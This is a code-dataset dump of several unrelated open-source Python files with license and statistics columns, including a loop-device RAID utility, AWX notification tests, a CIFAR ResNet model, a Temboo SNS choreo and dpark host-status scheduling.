pattern = r"\[\[(?:%s|%s):\s*(?P<filename>[^\|\]]+?)\s*(?:\|(?P<options>(?:[^\[\]]|\[[^\[\]]*\]|\[\[[^\[\]]*\]\])*))?\]\]" % (BASEWORD, self.word)
for match in re.finditer(pattern, text):
if match:
#d = match.groupdict(None)
f = match.group('filename')
p = ImageProps()
for s in match.group('options').split('|'):
if s == 'thumb' or s == 'thumbnail':
p.thumbnail = True
                elif s == 'upright':
                    p.upright = True
elif s[-2:] == 'px':
dims = s[:-2].split('x')
if len(dims) > 0:
p.width = int(dims[0])
if len(dims) > 1:
p.height = int(dims[1])
print (f,p)
L.append((f,p))
return L
def get_images_info(self, title):
text = self.db.getExpandedArticle(title)
return self.find_images(text)
def list_images(self, title):
props = self.get_images_info(title)
filenames = [t[0] for t in props]
return filenames
def get_metadata_all(self, titles):
d = collections.defaultdict(list)
for t in titles:
L = self.get_images_info(t)
for (fname, props) in L:
d[fname].append(props)
return d
def read_links(index):
f = open(index)
text = f.read()
f.close()
titles = []
for match in re.finditer('href\s*=\s*[\'\"]/wiki/([^\'\"]+)[\'\"]', text):
if match:
titles.append(match.group(1))
return titles
def main_task(db_path, indexfile, image_word, base_dir, thumb_width):
titles = read_links(indexfile)
print titles
server.load_db(db_path)
p = ImageFinder(image_word)
m = p.get_metadata_all(titles)
print m
download_and_process(m, base_dir, thumb_width)
#main_task("/home/olpc/40ormore.xml.bz2", "../static/index.html", "Imagen", "/home/olpc/images", 180)
process_imagelist("top70k_images", "../es_PE/images", "Imagen", 23000000)
| gpl-2.0 | 3,602,485,294,776,905,700 | 35.023077 | 306 | 0.494768 | false |
erikbodzsar/fraid | fraid.py | 1 | 7062 | #!/usr/bin/python
"""
fraid utility to create virtual disks
that are distributed on multiple physical disks.
"""
from os import listdir, path, mkdir, access, F_OK, devnull, remove, getuid
from subprocess import check_output, PIPE, Popen
from re import match
try:
check_output(["mdadm" ,"--help"])
except OSError:
print "mdadm package must be installed!"
quit()
if getuid() != 0:
print "this script needs to be run as root!"
quit()
CONFIG_DIR = "/etc/fraid"
if not access(CONFIG_DIR, F_OK):
mkdir(CONFIG_DIR)
check_output(["modprobe", "loop"])
DEV_NULL = open(devnull, "w")
def usage():
"""
Prints usage info.
"""
print "Commands:"
print " list : list current fraids"
print \
" create name size dirs... : create a new fraid called name,\n" + \
" "*29 + "with a per-file capacity of size GB,\n" + \
" "*29 + "storing files in the directories specified by dirs"
print " up name : create the device /dev/md/name for fraid name"
print " down name : remote the md and loop devices corresponding to name"
print " delete name : delete the files and metadata of fraid name"
print " quit : quit fraid"
def get_loops():
"""
Returns a dictionary that maps files to loop devices.
"""
def parse_loop_dev(line):
"""
Parses a losetup -a output line into a (file, loopdevice) tuple.
"""
end_of_dev = line.find(':')
start_of_file = line.rfind('(')
return (line[start_of_file+1:-1], line[0:end_of_dev])
return dict(map(parse_loop_dev,
check_output(["losetup", "-a"]).splitlines()))
def create_loops(filenames):
"""
Create or identifies loop devices corresponding to files.
Returns a list of the loop devices.
"""
current = get_loops()
def create_loop(filename):
"""
Creates or identifies a loop device corresponding to a file.
"""
        if filename in current:
return current[filename]
else:
return check_output(["losetup", "-f", "--show", filename]).rstrip()
return map(create_loop, filenames)
def read_dirs_from_config(config):
"""
Returns a list of the directories of a fraid.
"""
return open(CONFIG_DIR+"/"+config, "r").read().splitlines()
def read_files_from_config(name):
"""
Returns a list of the files of a fraid.
"""
return [d+"/"+name+".fdisk" for d in read_dirs_from_config(name)]
def active_mds():
"""
Returns a list of the active mds.
"""
try:
return listdir("/dev/md")
except:
return []
def current_fraids():
"""
Returns a list of the created fraids.
"""
return listdir(CONFIG_DIR)
def fraid_exists(name):
"""
Checks if a fraid already exists.
"""
return name in current_fraids()
def activate_fraid(name):
"""
Create necessary loops for a fraid and then create the md device.
"""
loops = create_loops(read_files_from_config(name))
mdproc = Popen(["mdadm", "--create", "/dev/md/"+name,
"--level=0", "--raid-devices="+str(len(loops))] + loops,
stdin=PIPE, stdout=DEV_NULL, stderr=DEV_NULL)
mdproc.communicate("y")
mdproc.wait()
print "device for fraid", name, "created at /dev/md/"+name
def ask_user(question):
"""
Ask user a yes/no question and return answer as a boolean.
"""
while True:
ans = raw_input(question + " [y/n] ")
if ans == "y" or ans == "n":
return ans == "y"
def create_fraid(name, size, dirs):
"""
Create metadata and files for fraid name.
"""
def create_file_bg(directory):
"""
Create the fraid file in a background process.
"""
return Popen(
["dd", "if=/dev/zero", "of="+directory+"/"+name+".fdisk",
"bs=1G", "count="+str(size)], stderr=DEV_NULL)
with open(CONFIG_DIR+"/"+name, "w") as fraidfile:
for directory in dirs:
fraidfile.write(directory+"\n")
for proc in map(create_file_bg, dirs):
proc.wait()
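# Minimal illustrative sketch (not called anywhere): the same flow the "create"
# command in main() performs, with made-up name, size and directories.
def _example_create_two_disk_fraid():
    name, size_gb, dirs = "example", 1, ["/mnt/diskA", "/mnt/diskB"]
    if not fraid_exists(name):
        create_fraid(name, size_gb, dirs)  # writes metadata and zero-filled files
        activate_fraid(name)               # sets up loop devices and /dev/md/example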
def main():
"""
Command handling loop.
"""
while True:
cmds = raw_input("> ").rstrip().split(" ")
cmd = cmds[0]
args = cmds[1:]
if cmd == "quit":
break
elif cmd == "list":
active = set(active_mds())
for fraid in current_fraids():
files = read_files_from_config(fraid)
print fraid, "[ACTIVE]" if fraid in active else "[INACTIVE]", \
path.getsize(files[0])*len(files)/pow(10, 9), "GB"
for filename in files:
print " ", filename
elif cmd == "up":
name = args[0]
if name in active_mds():
print name, "is already active!"
continue
activate_fraid(name)
elif cmd == "down":
name = args[0]
if not name in current_fraids():
print name, "is not a fraid!"
continue
if not name in active_mds():
print name, "is not active!"
continue
check_output(["mdadm", "--stop", "/dev/md/"+name], stderr=DEV_NULL)
loops = get_loops()
for dev in [loops[f] for f in read_files_from_config(name)]:
check_output(["losetup", "-d", dev])
elif cmd == "create":
if len(args) < 3:
print "Usage: create size dirs..."
continue
name = args[0]
if not match(r'^[A-Za-z0-9_]+$', name):
print name, "is not a valid fraid name! " \
"Please only use alphanumerics and underscores."
continue
if fraid_exists(name):
print name, "already exists!"
continue
size = 0
if args[1].isdigit() and int(args[1]) > 0:
size = int(args[1])
else:
print "size (" + args[1] + ") is not a positive integer!"
continue
dirs = args[2:]
if len(dirs) != len(set(dirs)):
print "directory list has duplicates!"
continue
create_fraid(name, size, dirs)
activate_fraid(name)
elif cmd == "delete":
name = args[0]
if not fraid_exists(name):
print name, "doesn't exist!"
continue
if name in active_mds():
print name, "is active! do down", name, "first!"
continue
if ask_user("Are you sure you want to delete " + name + \
" and ALL corresponding files?"):
for filename in read_files_from_config(name):
remove(filename)
remove(CONFIG_DIR+"/"+name)
else:
usage()
if __name__ == "__main__":
main()
| mit | -1,271,671,296,261,225,200 | 28.797468 | 79 | 0.52648 | false |
henriquegemignani/randovania | randovania/game_description/item/item_database.py | 1 | 2137 | from dataclasses import dataclass
from typing import Dict, Tuple
from randovania.game_description.item.ammo import Ammo
from randovania.game_description.item.item_category import ItemCategory
from randovania.game_description.item.major_item import MajorItem
@dataclass(frozen=True)
class ItemDatabase:
major_items: Dict[str, MajorItem]
ammo: Dict[str, Ammo]
default_items: Dict[ItemCategory, Tuple[MajorItem, ...]]
def read_database(major_items_data: Dict,
ammo_data: Dict,
) -> ItemDatabase:
"""
:param major_items_data:
:param ammo_data:
:return:
"""
major_items = {
name: MajorItem.from_json(name, value)
for name, value in major_items_data["items"].items()
}
ammo = {
name: Ammo.from_json(name, value)
for name, value in ammo_data.items()
}
default_items = {
ItemCategory(category_name): tuple(major_items[item_name] for item_name in value)
for category_name, value in major_items_data["default_items"].items()
}
return ItemDatabase(major_items, ammo, default_items)
def write_database(database: ItemDatabase,
) -> Tuple[Dict, Dict]:
"""
:param database:
:return:
"""
major_items_data = {
name: item.as_json
for name, item in database.major_items.items()
}
ammo_data = {
name: ammo.as_json
for name, ammo in database.ammo.items()
}
default_data = {
category.value: [item.name for item in items]
for category, items in database.default_items.items()
}
return {"items": major_items_data, "default_items": default_data}, ammo_data
_TEMPLE_KEYS = ["Dark Agon Key", "Dark Torvus Key", "Ing Hive Key"]
def add_memo_data_keys(data: dict):
for i in range(1, 4):
for temple_key in _TEMPLE_KEYS:
data["{} {}".format(temple_key, i)] = data[temple_key]
for temple_key in _TEMPLE_KEYS:
data.pop(temple_key)
for i in range(1, 10):
data["Sky Temple Key {}".format(i)] = data["Sky Temple Key"]
data.pop("Sky Temple Key")
| gpl-3.0 | 4,753,134,319,902,174,000 | 25.382716 | 89 | 0.620028 | false |
start-jsk/jsk_apc | demos/selective_dualarm_stowing/python/selective_dualarm_stowing/utils/copy_chainermodel.py | 2 | 1611 | #!/usr/bin/env python
from ..models import BVLCAlex
import chainer
import fcn
def copy_alex_chainermodel(chainermodel_path, model):
bvlc_model = BVLCAlex()
chainer.serializers.load_hdf5(chainermodel_path, bvlc_model)
for link in bvlc_model.children():
link_name = link.name
if link_name.startswith('fc'):
continue
if getattr(model, link_name):
layer = getattr(model, link_name)
if layer.W.data.shape == link.W.data.shape:
layer.W.data = link.W.data
else:
print('link_name {0} has different shape {1} != {2}'.format(
link_name, layer.W.data.shape, link.W.data.shape))
def copy_vgg16_chainermodel(model):
vgg16_model = fcn.models.VGG16()
vgg16_path = vgg16_model.download()
chainer.serializers.load_npz(vgg16_path, vgg16_model)
for l in vgg16_model.children():
if l.name.startswith('conv'):
l1 = getattr(vgg16_model, l.name)
l2 = getattr(model, l.name)
assert l1.W.shape == l2.W.shape
assert l1.b.shape == l2.b.shape
l2.W.data[...] = l1.W.data[...]
l2.b.data[...] = l1.b.data[...]
elif l.name in ['fc6', 'fc7']:
if not hasattr(model, l.name):
continue
l1 = getattr(vgg16_model, l.name)
l2 = getattr(model, l.name)
if l1.W.size == l2.W.size and l1.b.size == l2.b.size:
l2.W.data[...] = l1.W.data.reshape(l2.W.shape)[...]
l2.b.data[...] = l1.b.data.reshape(l2.b.shape)[...]
| bsd-3-clause | 6,453,309,216,593,481,000 | 36.465116 | 76 | 0.55059 | false |
GoogleCloudPlatform/sap-deployment-automation | third_party/github.com/ansible/awx/awx/main/tests/functional/test_notifications.py | 1 | 6814 | from unittest import mock
import pytest
from requests.adapters import HTTPAdapter
from requests.utils import select_proxy
from requests.exceptions import ConnectionError
from awx.api.versioning import reverse
from awx.main.models.notifications import NotificationTemplate, Notification
from awx.main.models.inventory import Inventory, InventorySource
from awx.main.models.jobs import JobTemplate
@pytest.mark.django_db
def test_get_notification_template_list(get, user, notification_template):
url = reverse('api:notification_template_list')
response = get(url, user('admin', True))
assert response.status_code == 200
assert len(response.data['results']) == 1
@pytest.mark.django_db
def test_basic_parameterization(get, post, user, organization):
u = user('admin-poster', True)
url = reverse('api:notification_template_list')
response = post(url,
dict(name="test-webhook",
description="test webhook",
organization=organization.id,
notification_type="webhook",
notification_configuration=dict(url="http://localhost", disable_ssl_verification=False,
headers={"Test": "Header"})),
u)
assert response.status_code == 201
url = reverse('api:notification_template_detail', kwargs={'pk': response.data['id']})
response = get(url, u)
assert 'related' in response.data
assert 'organization' in response.data['related']
assert 'summary_fields' in response.data
assert 'organization' in response.data['summary_fields']
assert 'notifications' in response.data['related']
assert 'notification_configuration' in response.data
assert 'url' in response.data['notification_configuration']
assert 'headers' in response.data['notification_configuration']
assert 'messages' in response.data
assert response.data['messages'] == {'started': None, 'success': None, 'error': None, 'workflow_approval': None}
@pytest.mark.django_db
def test_encrypted_subfields(get, post, user, organization):
def assert_send(self, messages):
assert self.account_token == "shouldhide"
return 1
u = user('admin-poster', True)
url = reverse('api:notification_template_list')
response = post(url,
dict(name="test-twilio",
description="test twilio",
organization=organization.id,
notification_type="twilio",
notification_configuration=dict(account_sid="dummy",
account_token="shouldhide",
from_number="+19999999999",
to_numbers=["9998887777"])),
u)
assert response.status_code == 201
notification_template_actual = NotificationTemplate.objects.get(id=response.data['id'])
url = reverse('api:notification_template_detail', kwargs={'pk': response.data['id']})
response = get(url, u)
assert response.data['notification_configuration']['account_token'] == "$encrypted$"
with mock.patch.object(notification_template_actual.notification_class, "send_messages", assert_send):
notification_template_actual.send("Test", {'body': "Test"})
@pytest.mark.django_db
def test_inherited_notification_templates(get, post, user, organization, project):
u = user('admin-poster', True)
url = reverse('api:notification_template_list')
notification_templates = []
for nfiers in range(3):
response = post(url,
dict(name="test-webhook-{}".format(nfiers),
description="test webhook {}".format(nfiers),
organization=organization.id,
notification_type="webhook",
notification_configuration=dict(url="http://localhost", disable_ssl_verification=False,
headers={"Test": "Header"})),
u)
assert response.status_code == 201
notification_templates.append(response.data['id'])
i = Inventory.objects.create(name='test', organization=organization)
i.save()
isrc = InventorySource.objects.create(name='test', inventory=i, source='ec2')
isrc.save()
jt = JobTemplate.objects.create(name='test', inventory=i, project=project, playbook='debug.yml')
jt.save()
@pytest.mark.django_db
def test_notification_template_simple_patch(patch, notification_template, admin):
patch(reverse('api:notification_template_detail', kwargs={'pk': notification_template.id}), { 'name': 'foo'}, admin, expect=200)
@pytest.mark.django_db
def test_notification_template_invalid_notification_type(patch, notification_template, admin):
patch(reverse('api:notification_template_detail', kwargs={'pk': notification_template.id}), { 'notification_type': 'invalid'}, admin, expect=400)
@pytest.mark.django_db
def test_disallow_delete_when_notifications_pending(delete, user, notification_template):
u = user('superuser', True)
url = reverse('api:notification_template_detail', kwargs={'pk': notification_template.id})
Notification.objects.create(notification_template=notification_template,
status='pending')
response = delete(url, user=u)
assert response.status_code == 405
@pytest.mark.django_db
def test_custom_environment_injection(post, user, organization):
u = user('admin-poster', True)
url = reverse('api:notification_template_list')
response = post(url,
dict(name="test-webhook",
description="test webhook",
organization=organization.id,
notification_type="webhook",
notification_configuration=dict(url="https://example.org", disable_ssl_verification=False,
http_method="POST", headers={"Test": "Header"})),
u)
assert response.status_code == 201
template = NotificationTemplate.objects.get(pk=response.data['id'])
with pytest.raises(ConnectionError), \
mock.patch('django.conf.settings.AWX_TASK_ENV', {'HTTPS_PROXY': '192.168.50.100:1234'}), \
mock.patch.object(HTTPAdapter, 'send') as fake_send:
def _send_side_effect(request, **kw):
assert select_proxy(request.url, kw['proxies']) == '192.168.50.100:1234'
raise ConnectionError()
fake_send.side_effect = _send_side_effect
template.send('subject', 'message')
| apache-2.0 | -8,204,096,915,528,708,000 | 47.671429 | 149 | 0.621368 | false |
a-parhom/edx-platform | common/djangoapps/track/contexts.py | 4 | 1449 | """Generates common contexts"""
import logging
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from six import text_type
from openedx.core.lib.request_utils import COURSE_REGEX
log = logging.getLogger(__name__)
def course_context_from_url(url):
"""
Extracts the course_context from the given `url` and passes it on to
`course_context_from_course_id()`.
"""
url = url or ''
match = COURSE_REGEX.match(url)
course_id = None
if match:
course_id_string = match.group('course_id')
try:
course_id = CourseKey.from_string(course_id_string)
except InvalidKeyError:
log.warning(
'unable to parse course_id "{course_id}"'.format(
course_id=course_id_string
),
exc_info=True
)
return course_context_from_course_id(course_id)
def course_context_from_course_id(course_id):
"""
Creates a course context from a `course_id`.
Example Returned Context::
{
'course_id': 'org/course/run',
'org_id': 'org'
}
"""
if course_id is None:
return {'course_id': '', 'org_id': ''}
# TODO: Make this accept any CourseKey, and serialize it using .to_string
assert isinstance(course_id, CourseKey)
return {
'course_id': text_type(course_id),
'org_id': course_id.org,
}
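# Example (illustrative; the course key below is a made-up demo identifier):
#
#   key = CourseKey.from_string('course-v1:edX+DemoX+Demo_2019')
#   course_context_from_course_id(key)
#   # -> {'course_id': 'course-v1:edX+DemoX+Demo_2019', 'org_id': 'edX'}
#   course_context_from_course_id(None)
#   # -> {'course_id': '', 'org_id': ''}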
| agpl-3.0 | 3,403,443,364,130,557,400 | 24.421053 | 77 | 0.592823 | false |
googleinterns/out-of-distribution | src/resnet/resnet_3stage_softmax.py | 1 | 3281 | from typing import List
import torch
from torch import nn
from torch.nn import functional as F
from src.modules.normalize import Normalize
from src.resnet.residual_block import create_residual_stage
from src.resnet.shared import ResNet_Softmax, SoftmaxMode
class ResNet_3Stage_Softmax(ResNet_Softmax):
"""
Implements ResNet-v1 for classification on 32x32 RGB images (e.g. CIFAR-10).
Reference papers:
- Deep Residual Learning For Image Recognition (https://arxiv.org/pdf/1512.03385.pdf)
Reference implementations:
- akamaster (https://github.com/akamaster/pytorch_resnet_cifar10/blob/master/resnet.py)
"""
normalize: Normalize
conv1: nn.Conv2d
bn1: nn.BatchNorm2d
stage2: nn.Sequential
stage3: nn.Sequential
stage4: nn.Sequential
avgpool: nn.AdaptiveAvgPool2d
fc: nn.Linear
out_channels: int
def __init__(self, stage_sizes: List[int], n_classes: int):
super().__init__()
if len(stage_sizes) != 3:
raise ValueError("Stage_sizes must have length 3!")
if n_classes <= 1:
raise ValueError("N_classes must be greater than 1!")
self.init_layers(stage_sizes, n_classes)
self.reset_parameters()
self.out_channels = n_classes
def init_layers(self, stage_sizes: List[int], n_classes: int) -> None:
self.normalize = Normalize(3)
self.conv1 = nn.Conv2d(3, 16, 3, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.stage2 = create_residual_stage(stage_sizes[0], 16, 16, 1)
self.stage3 = create_residual_stage(stage_sizes[1], 16, 32, 2)
self.stage4 = create_residual_stage(stage_sizes[2], 32, 64, 2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(64, n_classes)
def reset_parameters(self) -> None:
for module in self.modules():
if isinstance(module, (nn.Conv2d, nn.Linear)):
nn.init.kaiming_normal_(module.weight, nonlinearity="relu")
def forward(self, x: torch.Tensor, mode: SoftmaxMode) -> torch.Tensor:
if x.shape[1:] != (3, 32, 32):
raise ValueError("Input tensor must have shape [N, C=3, H=32, W=32]!")
x = self.normalize(x)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x, inplace=True)
x = self.stage2(x)
x = self.stage3(x)
x = self.stage4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.fc(x)
if mode == SoftmaxMode.LOGITS:
return x
elif mode == SoftmaxMode.LOG_SOFTMAX:
return F.log_softmax(x, dim=1)
else:
assert mode == SoftmaxMode.SOFTMAX
return F.softmax(x, dim=1)
class ResNet20_Softmax(ResNet_3Stage_Softmax):
def __init__(self, n_classes: int):
super().__init__([3, 3, 3], n_classes)
class ResNet32_Softmax(ResNet_3Stage_Softmax):
def __init__(self, n_classes: int):
super().__init__([5, 5, 5], n_classes)
class ResNet44_Softmax(ResNet_3Stage_Softmax):
def __init__(self, n_classes: int):
super().__init__([7, 7, 7], n_classes)
class ResNet56_Softmax(ResNet_3Stage_Softmax):
def __init__(self, n_classes: int):
super().__init__([9, 9, 9], n_classes)
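# Example (illustrative): a forward pass through the smallest variant on a random
# batch; assumes torch and the surrounding `src` package are importable.
if __name__ == "__main__":
    net = ResNet20_Softmax(n_classes=10)
    x = torch.randn(4, 3, 32, 32)
    probs = net(x, SoftmaxMode.SOFTMAX)
    print(probs.shape)  # torch.Size([4, 10]); each row sums to ~1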
| apache-2.0 | 4,755,826,015,938,023,000 | 30.548077 | 91 | 0.614752 | false |
jordanemedlock/psychtruths | temboo/core/Library/Amazon/SNS/Unsubscribe.py | 5 | 3824 | # -*- coding: utf-8 -*-
###############################################################################
#
# Unsubscribe
# Deletes a specified subscription.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class Unsubscribe(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the Unsubscribe Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(Unsubscribe, self).__init__(temboo_session, '/Library/Amazon/SNS/Unsubscribe')
def new_input_set(self):
return UnsubscribeInputSet()
def _make_result_set(self, result, path):
return UnsubscribeResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return UnsubscribeChoreographyExecution(session, exec_id, path)
class UnsubscribeInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the Unsubscribe
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AWSAccessKeyId(self, value):
"""
Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
super(UnsubscribeInputSet, self)._set_input('AWSAccessKeyId', value)
def set_AWSSecretKeyId(self, value):
"""
Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
super(UnsubscribeInputSet, self)._set_input('AWSSecretKeyId', value)
def set_SubscriptionArn(self, value):
"""
Set the value of the SubscriptionArn input for this Choreo. ((required, string) The ARN of the subscription you want to delete.)
"""
super(UnsubscribeInputSet, self)._set_input('SubscriptionArn', value)
def set_UserRegion(self, value):
"""
Set the value of the UserRegion input for this Choreo. ((optional, string) The AWS region that corresponds to the SNS endpoint you wish to access. The default region is "us-east-1". See description below for valid values.)
"""
super(UnsubscribeInputSet, self)._set_input('UserRegion', value)
class UnsubscribeResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the Unsubscribe Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((xml) The response from Amazon.)
"""
return self._output.get('Response', None)
class UnsubscribeChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return UnsubscribeResultSet(response, path)
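# Example usage (illustrative; the credentials and ARN are placeholders, and the
# TembooSession import and execute_with_results call follow the standard Temboo
# Python SDK pattern rather than anything defined in this file):
#
#   from temboo.core.session import TembooSession
#   session = TembooSession('ACCOUNT_NAME', 'APP_NAME', 'APP_KEY')
#   choreo = Unsubscribe(session)
#   inputs = choreo.new_input_set()
#   inputs.set_AWSAccessKeyId('AKIA_PLACEHOLDER')
#   inputs.set_AWSSecretKeyId('SECRET_PLACEHOLDER')
#   inputs.set_SubscriptionArn('arn:aws:sns:us-east-1:123456789012:my-topic:subscription-id')
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())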
| apache-2.0 | 3,768,856,715,482,202,000 | 38.42268 | 230 | 0.675994 | false |
JohnLZeller/jenkinsapi | jenkinsapi_tests/unittests/test_fingerprint.py | 7 | 2101 | import mock
# To run unittests on python 2.6 please use unittest2 library
try:
import unittest2 as unittest
except ImportError:
import unittest
import hashlib
import requests
from jenkinsapi.jenkins import Jenkins
from jenkinsapi.jenkinsbase import JenkinsBase
from jenkinsapi.fingerprint import Fingerprint
from jenkinsapi.utils.requester import Requester
class TestFingerprint(unittest.TestCase):
def setUp(self):
self.baseurl = 'http://localhost:8080'
m = hashlib.md5()
m.update("some dummy string".encode('ascii'))
self.dummy_md5 = m.hexdigest()
@mock.patch.object(Jenkins, '_poll')
@mock.patch.object(JenkinsBase, '_poll')
def test_object_creation(self, _poll, _basepoll):
J = Jenkins(self.baseurl, username='foouser', password='foopassword')
self.fp_instance = Fingerprint(self.baseurl, self.dummy_md5, J)
self.assertTrue(isinstance(self.fp_instance, Fingerprint))
self.assertEquals(str(self.fp_instance), self.dummy_md5)
self.assertTrue(self.fp_instance.valid())
@mock.patch.object(Jenkins, '_poll')
@mock.patch.object(JenkinsBase, '_poll')
def test_valid_with_requests_HTTPError_404(self, _poll, _basepoll):
resp_obj = requests.models.Response()
resp_obj.status_code = 404
_poll.side_effect = requests.exceptions.HTTPError(response=resp_obj)
J = Jenkins(self.baseurl, username='foouser', password='foopassword')
fp = Fingerprint(self.baseurl, self.dummy_md5, J)
self.assertTrue(fp.valid())
@mock.patch.object(Jenkins, '_poll')
@mock.patch.object(JenkinsBase, '_poll')
def test_valid_with_requests_HTTPError_Not404(self, _poll, _basepoll):
resp_obj = requests.models.Response()
resp_obj.status_code = 401
_poll.side_effect = requests.exceptions.HTTPError(response=resp_obj)
J = Jenkins(self.baseurl, username='foouser', password='foopassword')
fp = Fingerprint(self.baseurl, self.dummy_md5, J)
self.assertFalse(fp.valid())
if __name__ == '__main__':
unittest.main()
| mit | -8,053,214,561,620,731,000 | 37.907407 | 77 | 0.687292 | false |
Manojkumar91/odoo_inresto | addons/l10n_gr/__init__.py | 8 | 1036 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2008 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
#import sandwich_wizard
#import order_create
| agpl-3.0 | 6,357,249,882,700,849,000 | 42.166667 | 78 | 0.603282 | false |
douban/dpark | dpark/hostatus.py | 1 | 6067 | import time
import random
from six.moves import filter
from dpark.utils.log import get_logger
PURGE_ELAPSED = 60 * 5
FAILED_TIMES = 2
logger = get_logger(__name__)
class HostStatus:
def __init__(self, hostname, purge_elapsed=PURGE_ELAPSED):
self.hostname = hostname
self.failed_log = []
self.succeeded_log = []
self.failed_cnt = 0
self.succeed_cnt = 0
self.start_point = 0
self.failed_tasks = {}
self.purge_elapsed = purge_elapsed
def task_succeed(self, task_id):
self.succeeded_log.append(time.time())
if task_id in self.failed_tasks:
del self.failed_tasks[task_id]
def task_failed(self, task_id):
cur_ts = time.time()
self.failed_log.append(cur_ts)
if task_id in self.failed_tasks:
self.failed_tasks[task_id].append(cur_ts)
else:
self.failed_tasks[task_id] = [cur_ts]
def purge_old(self):
cur_ts = time.time()
prev_ts = cur_ts - self.purge_elapsed
self.failed_log = list(filter(lambda x: x > prev_ts, self.failed_log))
self.succeeded_log = list(filter(lambda x: x > prev_ts,
self.succeeded_log))
self.failed_cnt = len(self.failed_log)
self.succeed_cnt = len(self.succeeded_log)
self.start_point = self._begin_log_ts()
def recent_succeed_rate(self):
self.purge_old()
if self.failed_cnt + self.succeed_cnt < 1:
return 1
return self.succeed_cnt * 1.0 / (self.succeed_cnt + self.failed_cnt)
def failed_on(self, task_id):
return task_id in self.failed_tasks
def should_forbit(self, task_id):
self.purge_old()
if task_id in self.failed_tasks:
cur_elapsed = time.time() - self.failed_tasks[task_id][-1]
mask_elapsed = self.purge_elapsed * pow(2, len(self.failed_tasks[task_id]))
return cur_elapsed < mask_elapsed
return False
def _begin_log_ts(self):
ts = [time.time()]
if self.failed_log:
ts.append(self.failed_log[0])
if self.succeeded_log:
ts.append(self.succeeded_log[0])
return min(ts)
def total_recent_task_run(self):
return self.succeed_cnt + self.failed_cnt
def erase_failed_task(self, task_id):
if task_id in self.failed_tasks:
del self.failed_tasks[task_id]
class TaskHostManager:
def __init__(self):
self.host_dict = {}
self.task_host_failed_dict = {}
def register_host(self, hostname, purge_elapsed=PURGE_ELAPSED):
if hostname not in self.host_dict:
# logger.debug('register %s to the task host manager', hostname)
self.host_dict[hostname] = HostStatus(hostname, purge_elapsed=purge_elapsed)
def task_failed_on_host(self, task_id, host):
if host in self.host_dict:
host_status = self.host_dict[host]
return host_status.failed_on(task_id)
return False
def offer_choice(self, tid, host_offers, blacklist):
ordi_hosts = []
fail_hosts = []
forbit_host = []
for host in host_offers:
host_status = self.host_dict[host]
if host in blacklist or host_status.should_forbit(tid):
forbit_host.append(host)
elif self.task_failed_on_host(tid, host):
fail_hosts.append((host, host_status.recent_succeed_rate()))
else:
ordi_hosts.append((host, host_status.recent_succeed_rate()))
        logger.debug('split the offer into three parts \n '
'ordinary %s \nonce failed %s blacklist host %s',
str(ordi_hosts), str(fail_hosts), str(forbit_host))
if ordi_hosts:
return host_offers[self._random_weighted_choice(ordi_hosts)]
elif fail_hosts:
return host_offers[self._random_weighted_choice(fail_hosts)]
return None, None
@staticmethod
def _random_weighted_choice(w_list):
total = sum(w for h, w in w_list)
chosen_w = random.uniform(0, total)
cur_w = 0
for h, w in w_list:
if cur_w + w >= chosen_w:
return h
cur_w += w
assert False, 'Should not get here'
def task_succeed(self, task_id, hostname, reason):
logger.debug('task %s %s', task_id, str(reason))
if hostname in self.host_dict:
host_status = self.host_dict[hostname]
host_status.task_succeed(task_id)
if task_id in self.task_host_failed_dict:
for host in self.task_host_failed_dict[task_id]:
self.host_dict[host].erase_failed_task(task_id)
logger.debug('the failed hosts %s for task %s',
str(self.task_host_failed_dict[task_id]), task_id)
del self.task_host_failed_dict[task_id]
def task_failed(self, task_id, hostname, reason):
logger.debug('task %s failed with message %s', task_id, str(reason))
if hostname in self.host_dict:
host_status = self.host_dict[hostname]
host_status.task_failed(task_id)
if task_id not in self.task_host_failed_dict:
self.task_host_failed_dict[task_id] = set()
self.task_host_failed_dict[task_id].add(hostname)
def is_unhealthy_host(self, host):
if host not in self.host_dict:
return False
host_status = self.host_dict[host]
succeed_rate = host_status.recent_succeed_rate()
duration = time.time() - host_status.start_point
total_tasks = host_status.total_recent_task_run()
if duration > 30 and total_tasks > 20 and succeed_rate < 0.1:
logger.debug('the host %s will be judge unhealthy for '
